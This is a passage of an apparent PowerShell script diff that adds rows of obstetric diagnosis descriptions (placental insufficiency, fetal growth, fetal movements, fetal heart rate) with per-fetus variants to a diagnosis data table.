fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, first trimester","Maternal care for known or suspected placental insufficiency, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, first trimester","Maternal care for known or suspected placental insufficiency, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, first trimester","Maternal care for known or suspected placental insufficiency, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, first trimester","Maternal care for known or suspected placental insufficiency, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, second trimester","Maternal care for known or suspected placental insufficiency, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, second trimester","Maternal care for known or suspected placental insufficiency, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, second trimester","Maternal care for known or suspected placental insufficiency, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, second trimester","Maternal care for known or suspected placental insufficiency, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, second trimester","Maternal care for known or suspected placental insufficiency, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, second trimester","Maternal care for known or suspected placental insufficiency, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, second trimester","Maternal care for known or suspected placental insufficiency, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, third trimester","Maternal care for known or suspected placental insufficiency, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, third trimester","Maternal care for known or suspected placental insufficiency, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, third trimester","Maternal care for known or suspected placental insufficiency, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, third trimester","Maternal care for known or suspected placental insufficiency, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, third trimester","Maternal care for known or suspected placental insufficiency, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, third trimester","Maternal care for known or suspected placental insufficiency, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, third trimester","Maternal care for known or suspected placental insufficiency, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, unspecified trimester","Maternal care for known or suspected placental insufficiency, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, unspecified trimester","Maternal care for known or suspected placental insufficiency, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, unspecified trimester","Maternal care for known or suspected placental insufficiency, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, unspecified trimester","Maternal care for known or suspected placental insufficiency, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, unspecified trimester","Maternal care for known or suspected placental insufficiency, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, unspecified trimester","Maternal care for known or suspected placental insufficiency, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for known or suspected placental insufficiency, unspecified trimester","Maternal care for known or suspected placental insufficiency, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, first trimester","Maternal care for other known or suspected poor fetal growth, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, first trimester","Maternal care for other known or suspected poor fetal growth, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, first trimester","Maternal care for other known or suspected poor fetal growth, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, first trimester","Maternal care for other known or suspected poor fetal growth, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, first trimester","Maternal care for other known or suspected poor fetal growth, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, first trimester","Maternal care for other known or suspected poor fetal growth, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, first trimester","Maternal care for other known or suspected poor fetal growth, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, second trimester","Maternal care for other known or suspected poor fetal growth, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, second trimester","Maternal care for other known or suspected poor fetal growth, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, second trimester","Maternal care for other known or suspected poor fetal growth, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, second trimester","Maternal care for other known or suspected poor fetal growth, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, second trimester","Maternal care for other known or suspected poor fetal growth, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, second trimester","Maternal care for other known or suspected poor fetal growth, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, second trimester","Maternal care for other known or suspected poor fetal growth, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, third trimester","Maternal care for other known or suspected poor fetal growth, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, third trimester","Maternal care for other known or suspected poor fetal growth, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, third trimester","Maternal care for other known or suspected poor fetal growth, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, third trimester","Maternal care for other known or suspected poor fetal growth, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, third trimester","Maternal care for other known or suspected poor fetal growth, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, third trimester","Maternal care for other known or suspected poor fetal growth, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, third trimester","Maternal care for other known or suspected poor fetal growth, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, unspecified trimester","Maternal care for other known or suspected poor fetal growth, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, unspecified trimester","Maternal care for other known or suspected poor fetal growth, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, unspecified trimester","Maternal care for other known or suspected poor fetal growth, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, unspecified trimester","Maternal care for other known or suspected poor fetal growth, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, unspecified trimester","Maternal care for other known or suspected poor fetal growth, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, unspecified trimester","Maternal care for other known or suspected poor fetal growth, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other known or suspected poor fetal growth, unspecified trimester","Maternal care for other known or suspected poor fetal growth, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, unspecified trimester","Maternal care for excessive fetal growth, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, unspecified trimester","Maternal care for excessive fetal growth, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, unspecified trimester","Maternal care for excessive fetal growth, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, unspecified trimester","Maternal care for excessive fetal growth, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, unspecified trimester","Maternal care for excessive fetal growth, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, unspecified trimester","Maternal care for excessive fetal growth, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, unspecified trimester","Maternal care for excessive fetal growth, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, first trimester","Maternal care for excessive fetal growth, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, first trimester","Maternal care for excessive fetal growth, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, first trimester","Maternal care for excessive fetal growth, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, first trimester","Maternal care for excessive fetal growth, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, first trimester","Maternal care for excessive fetal growth, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, first trimester","Maternal care for excessive fetal growth, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, first trimester","Maternal care for excessive fetal growth, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, second trimester","Maternal care for excessive fetal growth, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, second trimester","Maternal care for excessive fetal growth, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, second trimester","Maternal care for excessive fetal growth, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, second trimester","Maternal care for excessive fetal growth, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, second trimester","Maternal care for excessive fetal growth, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, second trimester","Maternal care for excessive fetal growth, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, second trimester","Maternal care for excessive fetal growth, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, third trimester","Maternal care for excessive fetal growth, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, third trimester","Maternal care for excessive fetal growth, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, third trimester","Maternal care for excessive fetal growth, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, third trimester","Maternal care for excessive fetal growth, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, third trimester","Maternal care for excessive fetal growth, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, third trimester","Maternal care for excessive fetal growth, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for excessive fetal growth, third trimester","Maternal care for excessive fetal growth, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, unspecified trimester","Maternal care for viable fetus in abdominal pregnancy, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, unspecified trimester","Maternal care for viable fetus in abdominal pregnancy, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, unspecified trimester","Maternal care for viable fetus in abdominal pregnancy, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, unspecified trimester","Maternal care for viable fetus in abdominal pregnancy, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, unspecified trimester","Maternal care for viable fetus in abdominal pregnancy, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, unspecified trimester","Maternal care for viable fetus in abdominal pregnancy, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, unspecified trimester","Maternal care for viable fetus in abdominal pregnancy, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, first trimester","Maternal care for viable fetus in abdominal pregnancy, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, first trimester","Maternal care for viable fetus in abdominal pregnancy, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, first trimester","Maternal care for viable fetus in abdominal pregnancy, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, first trimester","Maternal care for viable fetus in abdominal pregnancy, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, first trimester","Maternal care for viable fetus in abdominal pregnancy, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, first trimester","Maternal care for viable fetus in abdominal pregnancy, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, first trimester","Maternal care for viable fetus in abdominal pregnancy, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, second trimester","Maternal care for viable fetus in abdominal pregnancy, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, second trimester","Maternal care for viable fetus in abdominal pregnancy, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, second trimester","Maternal care for viable fetus in abdominal pregnancy, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, second trimester","Maternal care for viable fetus in abdominal pregnancy, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, second trimester","Maternal care for viable fetus in abdominal pregnancy, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, second trimester","Maternal care for viable fetus in abdominal pregnancy, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, second trimester","Maternal care for viable fetus in abdominal pregnancy, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, third trimester","Maternal care for viable fetus in abdominal pregnancy, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, third trimester","Maternal care for viable fetus in abdominal pregnancy, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, third trimester","Maternal care for viable fetus in abdominal pregnancy, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, third trimester","Maternal care for viable fetus in abdominal pregnancy, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, third trimester","Maternal care for viable fetus in abdominal pregnancy, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, third trimester","Maternal care for viable fetus in abdominal pregnancy, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for viable fetus in abdominal pregnancy, third trimester","Maternal care for viable fetus in abdominal pregnancy, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Pregnancy with inconclusive fetal viability","Pregnancy with inconclusive fetal viability, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Pregnancy with inconclusive fetal viability","Pregnancy with inconclusive fetal viability, fetus 1") + $null = $DiagnosisList.Rows.Add("Pregnancy with inconclusive fetal viability","Pregnancy with inconclusive fetal viability, fetus 2") + $null = $DiagnosisList.Rows.Add("Pregnancy with inconclusive fetal viability","Pregnancy with inconclusive fetal viability, fetus 3") + $null = $DiagnosisList.Rows.Add("Pregnancy with inconclusive fetal viability","Pregnancy with inconclusive fetal viability, fetus 4") + $null = $DiagnosisList.Rows.Add("Pregnancy with inconclusive fetal viability","Pregnancy with inconclusive fetal viability, fetus 5") + $null = $DiagnosisList.Rows.Add("Pregnancy with inconclusive fetal viability","Pregnancy with inconclusive fetal viability, other fetus") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, second trimester","Decreased fetal movements, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, second trimester","Decreased fetal movements, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, second trimester","Decreased fetal movements, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, second trimester","Decreased fetal movements, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, second trimester","Decreased fetal movements, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, second trimester","Decreased fetal movements, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, second trimester","Decreased fetal movements, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, third trimester","Decreased fetal movements, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, third trimester","Decreased fetal movements, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, third trimester","Decreased fetal movements, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, third trimester","Decreased fetal movements, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, third trimester","Decreased fetal movements, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, third trimester","Decreased fetal movements, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, third trimester","Decreased fetal movements, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, unspecified trimester","Decreased fetal movements, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, unspecified trimester","Decreased fetal movements, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, unspecified trimester","Decreased fetal movements, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, unspecified trimester","Decreased fetal movements, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, unspecified trimester","Decreased fetal movements, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, unspecified trimester","Decreased fetal movements, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Decreased fetal movements, unspecified trimester","Decreased fetal movements, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, first trimester","Fetal anemia and thrombocytopenia, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, first trimester","Fetal anemia and thrombocytopenia, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, first trimester","Fetal anemia and thrombocytopenia, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, first trimester","Fetal anemia and thrombocytopenia, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, first trimester","Fetal anemia and thrombocytopenia, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, first trimester","Fetal anemia and thrombocytopenia, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, first trimester","Fetal anemia and thrombocytopenia, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, second trimester","Fetal anemia and thrombocytopenia, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, second trimester","Fetal anemia and thrombocytopenia, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, second trimester","Fetal anemia and thrombocytopenia, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, second trimester","Fetal anemia and thrombocytopenia, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, second trimester","Fetal anemia and thrombocytopenia, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, second trimester","Fetal anemia and thrombocytopenia, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, second trimester","Fetal anemia and thrombocytopenia, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, third trimester","Fetal anemia and thrombocytopenia, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, third trimester","Fetal anemia and thrombocytopenia, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, third trimester","Fetal anemia and thrombocytopenia, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, third trimester","Fetal anemia and thrombocytopenia, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, third trimester","Fetal anemia and thrombocytopenia, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, third trimester","Fetal anemia and thrombocytopenia, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, third trimester","Fetal anemia and thrombocytopenia, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, unspecified trimester","Fetal anemia and thrombocytopenia, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, unspecified trimester","Fetal anemia and thrombocytopenia, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, unspecified trimester","Fetal anemia and thrombocytopenia, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, unspecified trimester","Fetal anemia and thrombocytopenia, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, unspecified trimester","Fetal anemia and thrombocytopenia, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, unspecified trimester","Fetal anemia and thrombocytopenia, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Fetal anemia and thrombocytopenia, unspecified trimester","Fetal anemia and thrombocytopenia, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, first trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, first trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, first trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, first trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, first trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, first trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, first trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, second trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, second trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, second trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, second trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, second trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, second trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, second trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, third trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, third trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, third trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, third trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, third trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, third trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, third trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, unspecified trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, unspecified trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, unspecified trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, unspecified trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, unspecified trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, unspecified trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for abnormalities of the fetal heart rate or rhythm, unspecified trimester","Maternal care for abnormalities of the fetal heart rate or rhythm, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, first trimester","Maternal care for other specified fetal problems, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, first trimester","Maternal care for other specified fetal problems, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, first trimester","Maternal care for other specified fetal problems, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, first trimester","Maternal care for other specified fetal problems, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, first trimester","Maternal care for other specified fetal problems, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, first trimester","Maternal care for other specified fetal problems, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, first trimester","Maternal care for other specified fetal problems, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Maternal care for other specified fetal problems, second trimester","Maternal care for other specified fetal 